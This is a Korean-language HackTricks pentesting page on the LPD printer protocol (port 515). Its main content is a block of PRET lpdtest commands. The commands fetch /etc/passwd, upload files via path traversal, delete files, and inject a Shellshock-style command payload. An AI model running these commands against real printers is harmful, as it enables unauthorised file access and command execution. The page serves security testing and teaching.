hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
2024-02-10 21:30:13 +00:00

55 lines
4.1 KiB
Markdown

<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를** **팔로우**하세요.
* **Hacking 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
</details>
### **LPD 프로토콜 소개**
1980년대에는 **Line Printer Daemon (LPD) 프로토콜**이 Berkeley Unix에서 개발되었으며, 나중에 RFC1179를 통해 공식화되었습니다. 이 프로토콜은 515/tcp 포트를 통해 작동하며, `lpr` 명령을 통해 상호작용할 수 있습니다. LPD를 통한 인쇄의 핵심은 **제어 파일**(작업 세부 정보 및 사용자 지정)과 함께 **데이터 파일**(인쇄 정보를 보유)을 보내는 것입니다. 제어 파일을 통해 데이터 파일에 대한 **다양한 파일 형식**을 선택할 수 있지만, 이러한 파일의 처리는 특정 LPD 구현에 따라 결정됩니다. Unix와 유사한 시스템에서 널리 인정받는 구현체는 **LPRng**입니다. 특히, LPD 프로토콜은 악성 PostScript 또는 PJL 인쇄 작업을 실행하기 위해 악용될 수 있습니다.
### **LPD 프린터와 상호작용하기 위한 도구**
[**PRET**](https://github.com/RUB-NDS/PRET)는 LPD 호환 프린터와 상호작용하기 위한 두 가지 필수 도구인 `lpdprint``lpdtest`를 소개합니다. 이 도구들은 데이터를 인쇄하거나 프린터 상의 파일을 조작하는 다양한 작업을 가능하게 합니다. 파일의 다운로드, 업로드, 삭제 등이 가능합니다:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
프린터 해킹을 더 탐구하고 싶은 개인들을 위한 포괄적인 자료는 [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page)에서 찾을 수 있습니다.
# Shodan
* `포트 515`
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family)인 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를** **팔로우**하세요.
* **HackTricks**와 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.
</details>